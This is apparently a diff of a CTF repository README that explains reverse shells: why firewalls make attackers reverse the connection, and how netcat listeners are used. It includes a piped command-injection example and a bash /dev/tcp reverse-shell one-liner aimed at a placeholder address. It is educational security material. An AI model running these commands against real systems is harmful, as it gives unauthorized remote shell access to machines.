Aledangelo/NetworkSecurity-CTF/README.md

 * **ls -l | whoami**

 ### Reverse Shell
+To gain control over a compromised system, an attacker usually aims to gain interactive shell access for arbitrary command execution.
+With such access, they can try to elevate their privileges to obtain full control of the operating system.
+However, most systems are behind firewalls and direct remote shell connections are impossible.
+One of the methods used to circumvent this limitation is a reverse shell.

+In a typical remote system access scenario, the user is the client and the target machine is the server.
+The user initiates a remote shell connection and the target system listens for such connections.
+With a reverse shell, the roles are opposite.
+It is the target machine that initiates the connection to the user, and the user’s computer listens for incoming connections on a specified port.

+The primary reason why reverse shells are often used by attackers is the way that most firewalls are configured.
+Attacked servers usually allow connections only on specific ports.
+For example, a dedicated web server will only accept connections on ports 80 and 443.
+This means that there is no possibility to establish a shell listener on the attacked server.
+On the other hand, firewalls usually do not limit outgoing connections at all.
+Therefore, an attacker may establish a server on their own machine and create a reverse connection.
+All that the attacker needs is a machine that has a public (routable) IP address and a tool such as netcat to create the listener and bind shell access to it.

 It is possible to have the server open a terminal to our attacking machine.
 To do this, you can open a shell to a remote address with a simple terminal command:
 * **bash -i >& /dev/tcp/IP_ADDRESS/PORT**